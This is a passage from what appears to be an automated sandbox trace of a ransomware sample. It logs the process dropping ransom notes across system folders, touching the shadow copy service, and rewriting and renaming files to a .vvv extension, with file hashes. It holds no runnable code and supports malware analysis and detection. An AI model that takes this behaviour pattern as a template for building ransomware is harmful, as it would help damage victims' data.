7144.            ads:
7145.          fid (ads:): 562949953521021
7146.          ntstatus: 0x0
7147.          CreateOptions: 0x60
7148.        file:
7149.          timestamp: 47204
7150.          mode: close
7151.          sequenceNumber: 543
7152.          value: C:\Boot\pl-PL\how_recover+deg.txt
7153.          filesize: 2673
7154.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
7155.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
7156.          processinfo:
7157.            pid: 1648
7158.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7159.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7160.            ads:
7161.          fid (ads:): 562949953521021
7162.          ntstatus: 0x0
7163.          CreateOptions: 0x0
7164.        file:
7165.          timestamp: 47237
7166.          mode: created
7167.          sequenceNumber: 544
7168.          value: C:\Boot\pl-PL\how_recover+deg.html
7169.          processinfo:
7170.            pid: 1648
7171.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7172.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7173.            ads:
7174.          fid (ads:): 562949953521022
7175.          ntstatus: 0x0
7176.          CreateOptions: 0x60
7177.        file:
7178.          timestamp: 47245
7179.          mode: close
7180.          sequenceNumber: 545
7181.          value: C:\Boot\pl-PL\how_recover+deg.html
7182.          filesize: 9480
7183.          md5sum: a68c3caf0be8f1a393c697136926cfd4
7184.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
7185.          processinfo:
7186.            pid: 1648
7187.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7188.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7189.            ads:
7190.          fid (ads:): 562949953521022
7191.          ntstatus: 0x0
7192.          CreateOptions: 0x0
7193.        file:
7194.          timestamp: 47252
7195.          mode: created
7196.          sequenceNumber: 546
7197.          value: C:\Boot\pt-BR\how_recover+deg.txt
7198.          processinfo:
7199.            pid: 1648
7200.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7201.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7202.            ads:
7203.          fid (ads:): 562949953521023
7204.          ntstatus: 0x0
7205.          CreateOptions: 0x60
7206.        file:
7207.          timestamp: 47257
7208.          mode: close
7209.          sequenceNumber: 547
7210.          value: C:\Boot\pt-BR\how_recover+deg.txt
7211.          filesize: 2673
7212.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
7213.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
7214.          processinfo:
7215.            pid: 1648
7216.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7217.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7218.            ads:
7219.          fid (ads:): 562949953521023
7220.          ntstatus: 0x0
7221.          CreateOptions: 0x0
7222.        file:
7223.          timestamp: 47267
7224.          mode: created
7225.          sequenceNumber: 548
7226.          value: C:\Boot\pt-BR\how_recover+deg.html
7227.          processinfo:
7228.            pid: 1648
7229.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7230.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7231.            ads:
7232.          fid (ads:): 562949953521024
7233.          ntstatus: 0x0
7234.          CreateOptions: 0x60
7235.        file:
7236.          timestamp: 47272
7237.          mode: close
7238.          sequenceNumber: 549
7239.          value: C:\Boot\pt-BR\how_recover+deg.html
7240.          filesize: 9480
7241.          md5sum: a68c3caf0be8f1a393c697136926cfd4
7242.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
7243.          processinfo:
7244.            pid: 1648
7245.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7246.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7247.            ads:
7248.          fid (ads:): 562949953521024
7249.          ntstatus: 0x0
7250.          CreateOptions: 0x0
7251.        file:
7252.          timestamp: 47277
7253.          mode: created
7254.          sequenceNumber: 550
7255.          value: C:\Boot\pt-PT\how_recover+deg.txt
7256.          processinfo:
7257.            pid: 1648
7258.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7259.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7260.            ads:
7261.          fid (ads:): 562949953521025
7262.          ntstatus: 0x0
7263.          CreateOptions: 0x60
7264.        file:
7265.          timestamp: 47281
7266.          mode: close
7267.          sequenceNumber: 551
7268.          value: C:\Boot\pt-PT\how_recover+deg.txt
7269.          filesize: 2673
7270.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
7271.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
7272.          processinfo:
7273.            pid: 1648
7274.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7275.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7276.            ads:
7277.          fid (ads:): 562949953521025
7278.          ntstatus: 0x0
7279.          CreateOptions: 0x0
7280.        file:
7281.          timestamp: 47353
7282.          mode: created
7283.          sequenceNumber: 552
7284.          value: C:\Boot\pt-PT\how_recover+deg.html
7285.          processinfo:
7286.            pid: 1648
7287.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7288.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7289.            ads:
7290.          fid (ads:): 562949953521026
7291.          ntstatus: 0x0
7292.          CreateOptions: 0x60
7293.        file:
7294.          timestamp: 47358
7295.          mode: close
7296.          sequenceNumber: 553
7297.          value: C:\Boot\pt-PT\how_recover+deg.html
7298.          filesize: 9480
7299.          md5sum: a68c3caf0be8f1a393c697136926cfd4
7300.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
7301.          processinfo:
7302.            pid: 1648
7303.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7304.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7305.            ads:
7306.          fid (ads:): 562949953521026
7307.          ntstatus: 0x0
7308.          CreateOptions: 0x0
7309.        file:
7310.          timestamp: 47364
7311.          mode: created
7312.          sequenceNumber: 554
7313.          value: C:\Boot\ru-RU\how_recover+deg.txt
7314.          processinfo:
7315.            pid: 1648
7316.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7317.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7318.            ads:
7319.          fid (ads:): 562949953521027
7320.          ntstatus: 0x0
7321.          CreateOptions: 0x60
7322.        file:
7323.          timestamp: 47368
7324.          mode: close
7325.          sequenceNumber: 555
7326.          value: C:\Boot\ru-RU\how_recover+deg.txt
7327.          filesize: 2673
7328.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
7329.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
7330.          processinfo:
7331.            pid: 1648
7332.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7333.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7334.            ads:
7335.          fid (ads:): 562949953521027
7336.          ntstatus: 0x0
7337.          CreateOptions: 0x0
7338.        file:
7339.          timestamp: 47392
7340.          mode: created
7341.          sequenceNumber: 556
7342.          value: C:\Boot\ru-RU\how_recover+deg.html
7343.          processinfo:
7344.            pid: 1648
7345.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7346.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7347.            ads:
7348.          fid (ads:): 562949953521028
7349.          ntstatus: 0x0
7350.          CreateOptions: 0x60
7351.        file:
7352.          timestamp: 47397
7353.          mode: close
7354.          sequenceNumber: 557
7355.          value: C:\Boot\ru-RU\how_recover+deg.html
7356.          filesize: 9480
7357.          md5sum: a68c3caf0be8f1a393c697136926cfd4
7358.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
7359.          processinfo:
7360.            pid: 1648
7361.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7362.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7363.            ads:
7364.          fid (ads:): 562949953521028
7365.          ntstatus: 0x0
7366.          CreateOptions: 0x0
7367.        file:
7368.          timestamp: 47435
7369.          mode: created
7370.          sequenceNumber: 558
7371.          value: C:\Boot\sv-SE\how_recover+deg.txt
7372.          processinfo:
7373.            pid: 1648
7374.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7375.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7376.            ads:
7377.          fid (ads:): 562949953521029
7378.          ntstatus: 0x0
7379.          CreateOptions: 0x60
7380.        file:
7381.          timestamp: 47438
7382.          mode: close
7383.          sequenceNumber: 559
7384.          value: C:\Boot\sv-SE\how_recover+deg.txt
7385.          filesize: 2673
7386.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
7387.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
7388.          processinfo:
7389.            pid: 1648
7390.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7391.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7392.            ads:
7393.          fid (ads:): 562949953521029
7394.          ntstatus: 0x0
7395.          CreateOptions: 0x0
7396.        file:
7397.          timestamp: 47455
7398.          mode: created
7399.          sequenceNumber: 560
7400.          value: C:\Boot\sv-SE\how_recover+deg.html
7401.          processinfo:
7402.            pid: 1648
7403.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7404.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7405.            ads:
7406.          fid (ads:): 562949953521030
7407.          ntstatus: 0x0
7408.          CreateOptions: 0x60
7409.        file:
7410.          timestamp: 47460
7411.          mode: close
7412.          sequenceNumber: 561
7413.          value: C:\Boot\sv-SE\how_recover+deg.html
7414.          filesize: 9480
7415.          md5sum: a68c3caf0be8f1a393c697136926cfd4
7416.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
7417.          processinfo:
7418.            pid: 1648
7419.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7420.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7421.            ads:
7422.          fid (ads:): 562949953521030
7423.          ntstatus: 0x0
7424.          CreateOptions: 0x0
7425.        file:
7426.          timestamp: 47465
7427.          mode: created
7428.          sequenceNumber: 562
7429.          value: C:\Boot\tr-TR\how_recover+deg.txt
7430.          processinfo:
7431.            pid: 1648
7432.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7433.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7434.            ads:
7435.          fid (ads:): 562949953521031
7436.          ntstatus: 0x0
7437.          CreateOptions: 0x60
7438.        file:
7439.          timestamp: 47469
7440.          mode: close
7441.          sequenceNumber: 563
7442.          value: C:\Boot\tr-TR\how_recover+deg.txt
7443.          filesize: 2673
7444.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
7445.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
7446.          processinfo:
7447.            pid: 1648
7448.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7449.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7450.            ads:
7451.          fid (ads:): 562949953521031
7452.          ntstatus: 0x0
7453.          CreateOptions: 0x0
7454.        file:
7455.          timestamp: 47501
7456.          mode: created
7457.          sequenceNumber: 564
7458.          value: C:\Boot\tr-TR\how_recover+deg.html
7459.          processinfo:
7460.            pid: 1648
7461.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7462.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7463.            ads:
7464.          fid (ads:): 562949953521032
7465.          ntstatus: 0x0
7466.          CreateOptions: 0x60
7467.        file:
7468.          timestamp: 47507
7469.          mode: close
7470.          sequenceNumber: 565
7471.          value: C:\Boot\tr-TR\how_recover+deg.html
7472.          filesize: 9480
7473.          md5sum: a68c3caf0be8f1a393c697136926cfd4
7474.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
7475.          processinfo:
7476.            pid: 1648
7477.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7478.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7479.            ads:
7480.          fid (ads:): 562949953521032
7481.          ntstatus: 0x0
7482.          CreateOptions: 0x0
7483.        file:
7484.          timestamp: 47513
7485.          mode: created
7486.          sequenceNumber: 566
7487.          value: C:\Boot\zh-CN\how_recover+deg.txt
7488.          processinfo:
7489.            pid: 1648
7490.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7491.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7492.            ads:
7493.          fid (ads:): 562949953521033
7494.          ntstatus: 0x0
7495.          CreateOptions: 0x60
7496.        file:
7497.          timestamp: 47517
7498.          mode: close
7499.          sequenceNumber: 567
7500.          value: C:\Boot\zh-CN\how_recover+deg.txt
7501.          filesize: 2673
7502.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
7503.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
7504.          processinfo:
7505.            pid: 1648
7506.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7507.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7508.            ads:
7509.          fid (ads:): 562949953521033
7510.          ntstatus: 0x0
7511.          CreateOptions: 0x0
7512.        file:
7513.          timestamp: 47569
7514.          mode: created
7515.          sequenceNumber: 568
7516.          value: C:\Boot\zh-CN\how_recover+deg.html
7517.          processinfo:
7518.            pid: 1648
7519.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7520.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7521.            ads:
7522.          fid (ads:): 562949953521034
7523.          ntstatus: 0x0
7524.          CreateOptions: 0x60
7525.        file:
7526.          timestamp: 47574
7527.          mode: close
7528.          sequenceNumber: 569
7529.          value: C:\Boot\zh-CN\how_recover+deg.html
7530.          filesize: 9480
7531.          md5sum: a68c3caf0be8f1a393c697136926cfd4
7532.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
7533.          processinfo:
7534.            pid: 1648
7535.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7536.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7537.            ads:
7538.          fid (ads:): 562949953521034
7539.          ntstatus: 0x0
7540.          CreateOptions: 0x0
7541.        file:
7542.          timestamp: 47580
7543.          mode: created
7544.          sequenceNumber: 570
7545.          value: C:\Boot\zh-HK\how_recover+deg.txt
7546.          processinfo:
7547.            pid: 1648
7548.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7549.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7550.            ads:
7551.          fid (ads:): 562949953521035
7552.          ntstatus: 0x0
7553.          CreateOptions: 0x60
7554.        file:
7555.          timestamp: 47586
7556.          mode: close
7557.          sequenceNumber: 571
7558.          value: C:\Boot\zh-HK\how_recover+deg.txt
7559.          filesize: 2673
7560.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
7561.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
7562.          processinfo:
7563.            pid: 1648
7564.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7565.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7566.            ads:
7567.          fid (ads:): 562949953521035
7568.          ntstatus: 0x0
7569.          CreateOptions: 0x0
7570.        file:
7571.          timestamp: 47610
7572.          mode: created
7573.          sequenceNumber: 572
7574.          value: C:\Boot\zh-HK\how_recover+deg.html
7575.          processinfo:
7576.            pid: 1648
7577.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7578.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7579.            ads:
7580.          fid (ads:): 562949953521036
7581.          ntstatus: 0x0
7582.          CreateOptions: 0x60
7583.        file:
7584.          timestamp: 47614
7585.          mode: close
7586.          sequenceNumber: 573
7587.          value: C:\Boot\zh-HK\how_recover+deg.html
7588.          filesize: 9480
7589.          md5sum: a68c3caf0be8f1a393c697136926cfd4
7590.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
7591.          processinfo:
7592.            pid: 1648
7593.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7594.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7595.            ads:
7596.          fid (ads:): 562949953521036
7597.          ntstatus: 0x0
7598.          CreateOptions: 0x0
7599.        file:
7600.          timestamp: 47619
7601.          mode: created
7602.          sequenceNumber: 574
7603.          value: C:\Boot\zh-TW\how_recover+deg.txt
7604.          processinfo:
7605.            pid: 1648
7606.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7607.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7608.            ads:
7609.          fid (ads:): 562949953521037
7610.          ntstatus: 0x0
7611.          CreateOptions: 0x60
7612.        file:
7613.          timestamp: 47624
7614.          mode: close
7615.          sequenceNumber: 575
7616.          value: C:\Boot\zh-TW\how_recover+deg.txt
7617.          filesize: 2673
7618.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
7619.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
7620.          processinfo:
7621.            pid: 1648
7622.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7623.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7624.            ads:
7625.          fid (ads:): 562949953521037
7626.          ntstatus: 0x0
7627.          CreateOptions: 0x0
7628.        file:
7629.          timestamp: 47630
7630.          mode: created
7631.          sequenceNumber: 576
7632.          value: C:\Boot\zh-TW\how_recover+deg.html
7633.          processinfo:
7634.            pid: 1648
7635.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7636.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7637.            ads:
7638.          fid (ads:): 562949953521038
7639.          ntstatus: 0x0
7640.          CreateOptions: 0x60
7641.        file:
7642.          timestamp: 47635
7643.          mode: close
7644.          sequenceNumber: 577
7645.          value: C:\Boot\zh-TW\how_recover+deg.html
7646.          filesize: 9480
7647.          md5sum: a68c3caf0be8f1a393c697136926cfd4
7648.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
7649.          processinfo:
7650.            pid: 1648
7651.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7652.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7653.            ads:
7654.          fid (ads:): 562949953521038
7655.          ntstatus: 0x0
7656.          CreateOptions: 0x0
7657.        file:
7658.          timestamp: 47639
7659.          mode: created
7660.          sequenceNumber: 578
7661.          value: C:\Boot\how_recover+deg.txt
7662.          processinfo:
7663.            pid: 1648
7664.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7665.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7666.            ads:
7667.          fid (ads:): 562949953521039
7668.          ntstatus: 0x0
7669.          CreateOptions: 0x60
7670.        file:
7671.          timestamp: 47683
7672.          mode: close
7673.          sequenceNumber: 579
7674.          value: C:\Boot\how_recover+deg.txt
7675.          filesize: 2673
7676.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
7677.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
7678.          processinfo:
7679.            pid: 1648
7680.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7681.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7682.            ads:
7683.          fid (ads:): 562949953521039
7684.          ntstatus: 0x0
7685.          CreateOptions: 0x0
7686.        file:
7687.          timestamp: 47689
7688.          mode: created
7689.          sequenceNumber: 580
7690.          value: C:\Boot\how_recover+deg.html
7691.          processinfo:
7692.            pid: 1648
7693.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7694.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7695.            ads:
7696.          fid (ads:): 562949953521040
7697.          ntstatus: 0x0
7698.          CreateOptions: 0x60
7699.        file:
7700.          timestamp: 47693
7701.          mode: close
7702.          sequenceNumber: 581
7703.          value: C:\Boot\how_recover+deg.html
7704.          filesize: 9480
7705.          md5sum: a68c3caf0be8f1a393c697136926cfd4
7706.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
7707.          processinfo:
7708.            pid: 1648
7709.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7710.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7711.            ads:
7712.          fid (ads:): 562949953521040
7713.          ntstatus: 0x0
7714.          CreateOptions: 0x0
7715.        file:
7716.          timestamp: 47697
7717.          mode: failed
7718.          sequenceNumber: 582
7719.          value: C:\Documents and Settings
7720.          processinfo:
7721.            pid: 1648
7722.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7723.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7724.            ads:
7725.          fid (ads:): 0
7726.          failure: open
7727.          ntstatus: 0xc0000022
7728.          CreateOptions: 0x200021
7729.        file:
7730.          timestamp: 47700
7731.          mode: created
7732.          sequenceNumber: 583
7733.          value: C:\Users\how_recover+deg.txt
7734.          processinfo:
7735.            pid: 1648
7736.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7737.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7738.            ads:
7739.          fid (ads:): 562949953521041
7740.          ntstatus: 0x0
7741.          CreateOptions: 0x60
7742.        file:
7743.          timestamp: 47704
7744.          mode: close
7745.          sequenceNumber: 584
7746.          value: C:\Users\how_recover+deg.txt
7747.          filesize: 2673
7748.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
7749.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
7750.          processinfo:
7751.            pid: 1648
7752.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7753.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7754.            ads:
7755.          fid (ads:): 562949953521041
7756.          ntstatus: 0x0
7757.          CreateOptions: 0x0
7758.        file:
7759.          timestamp: 47709
7760.          mode: created
7761.          sequenceNumber: 585
7762.          value: C:\Users\how_recover+deg.html
7763.          processinfo:
7764.            pid: 1648
7765.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7766.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7767.            ads:
7768.          fid (ads:): 562949953521042
7769.          ntstatus: 0x0
7770.          CreateOptions: 0x60
7771.        file:
7772.          timestamp: 47712
7773.          mode: close
7774.          sequenceNumber: 586
7775.          value: C:\Users\how_recover+deg.html
7776.          filesize: 9480
7777.          md5sum: a68c3caf0be8f1a393c697136926cfd4
7778.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
7779.          processinfo:
7780.            pid: 1648
7781.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7782.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7783.            ads:
7784.          fid (ads:): 562949953521042
7785.          ntstatus: 0x0
7786.          CreateOptions: 0x0
7787.        file:
7788.          timestamp: 47743
7789.          mode: open
7790.          sequenceNumber: 587
7791.          value: C:\eula.1028.txt
7792.          filesize: 17734
7793.          processinfo:
7794.            pid: 1648
7795.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7796.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7797.            ads:
7798.          fid (ads:): 562949953519967
7799.          ntstatus: 0x0
7800.          CreateOptions: 0x60
7801.        uac:
7802.          timestamp: 47793
7803.          mode: service
7804.          sequenceNumber: 588
7805.          value: Microsoft Software Shadow Copy Provider
7806.          status: running
7807.        apicall:
7808.          timestamp: 47925
7809.          repeat: 80
7810.          sequenceNumber: 589
7811.          processinfo:
7812.            pid: 1648
7813.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7814.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7815.          dllname: kernel32.dll
7816.          apiname: Sleep
7817.          address: 0x0041ed5b
7818.        file:
7819.          timestamp: 48243
7820.          mode: close
7821.          sequenceNumber: 590
7822.          value: C:\eula.1028.txt
7823.          filesize: 18158
7824.          md5sum: 59b7c2120d1cfc81c66609e84d202bdf
7825.          sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
7826.          processinfo:
7827.            pid: 1648
7828.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7829.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7830.            ads:
7831.          fid (ads:): 562949953519967
7832.          ntstatus: 0x0
7833.          CreateOptions: 0x0
7834.        file:
7835.          timestamp: 48353
7836.          mode: rename
7837.          sequenceNumber: 591
7838.          filesize: 18158
7839.          md5sum: 59b7c2120d1cfc81c66609e84d202bdf
7840.          sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
7841.          processinfo:
7842.            pid: 1648
7843.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7844.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7845.          old_name: C:\eula.1028.txt
7846.          new_name: C:\eula.1028.txt.vvv
7847.            ads:
7848.          fid (ads:): 562949953519967
7849.          ntstatus: 0x0
7850.          CreateOptions: 0x0
7851.        file:
7852.          timestamp: 48475
7853.          mode: open
7854.          sequenceNumber: 592
7855.          value: C:\eula.1031.txt
7856.          filesize: 17734
7857.          processinfo:
7858.            pid: 1648
7859.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7860.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7861.            ads:
7862.          fid (ads:): 562949953519968
7863.          ntstatus: 0x0
7864.          CreateOptions: 0x60
7865.        apicall:
7866.          timestamp: 48784
7867.          repeat: 90
7868.          sequenceNumber: 593
7869.          processinfo:
7870.            pid: 1648
7871.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7872.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7873.          dllname: kernel32.dll
7874.          apiname: Sleep
7875.          address: 0x0041ed5b
7876.        file:
7877.          timestamp: 48851
7878.          mode: close
7879.          sequenceNumber: 594
7880.          value: C:\eula.1031.txt
7881.          filesize: 18158
7882.          md5sum: 59b7c2120d1cfc81c66609e84d202bdf
7883.          sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
7884.          processinfo:
7885.            pid: 1648
7886.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7887.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7888.            ads:
7889.          fid (ads:): 562949953519968
7890.          ntstatus: 0x0
7891.          CreateOptions: 0x0
7892.        file:
7893.          timestamp: 48885
7894.          mode: rename
7895.          sequenceNumber: 595
7896.          filesize: 18158
7897.          md5sum: 59b7c2120d1cfc81c66609e84d202bdf
7898.          sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
7899.          processinfo:
7900.            pid: 1648
7901.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7902.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7903.          old_name: C:\eula.1031.txt
7904.          new_name: C:\eula.1031.txt.vvv
7905.            ads:
7906.          fid (ads:): 562949953519968
7907.          ntstatus: 0x0
7908.          CreateOptions: 0x0
7909.        file:
7910.          timestamp: 48892
7911.          mode: open
7912.          sequenceNumber: 596
7913.          value: C:\eula.1033.txt
7914.          filesize: 10134
7915.          processinfo:
7916.            pid: 1648
7917.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7918.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7919.            ads:
7920.          fid (ads:): 562949953519969
7921.          ntstatus: 0x0
7922.          CreateOptions: 0x60
7923.        file:
7924.          timestamp: 48935
7925.          mode: close
7926.          sequenceNumber: 597
7927.          value: C:\eula.1033.txt
7928.          filesize: 10558
7929.          md5sum: 98d5c708eb7dc0eb5224954b3c577c62
7930.          sha1sum: 339c2094d53cddebf80e335d537b44646cbeec0f
7931.          processinfo:
7932.            pid: 1648
7933.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7934.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7935.            ads:
7936.          fid (ads:): 562949953519969
7937.          ntstatus: 0x0
7938.          CreateOptions: 0x0
7939.        file:
7940.          timestamp: 48946
7941.          mode: rename
7942.          sequenceNumber: 598
7943.          filesize: 10558
7944.          md5sum: 98d5c708eb7dc0eb5224954b3c577c62
7945.          sha1sum: 339c2094d53cddebf80e335d537b44646cbeec0f
7946.          processinfo:
7947.            pid: 1648
7948.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7949.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7950.          old_name: C:\eula.1033.txt
7951.          new_name: C:\eula.1033.txt.vvv
7952.            ads:
7953.          fid (ads:): 562949953519969
7954.          ntstatus: 0x0
7955.          CreateOptions: 0x0
7956.        file:
7957.          timestamp: 48963
7958.          mode: open
7959.          sequenceNumber: 599
7960.          value: C:\eula.1036.txt
7961.          filesize: 17734
7962.          processinfo:
7963.            pid: 1648
7964.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7965.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7966.            ads:
7967.          fid (ads:): 562949953519971
7968.          ntstatus: 0x0
7969.          CreateOptions: 0x60
7970.        file:
7971.          timestamp: 49216
7972.          mode: close
7973.          sequenceNumber: 600
7974.          value: C:\eula.1036.txt
7975.          filesize: 18158
7976.          md5sum: 59b7c2120d1cfc81c66609e84d202bdf
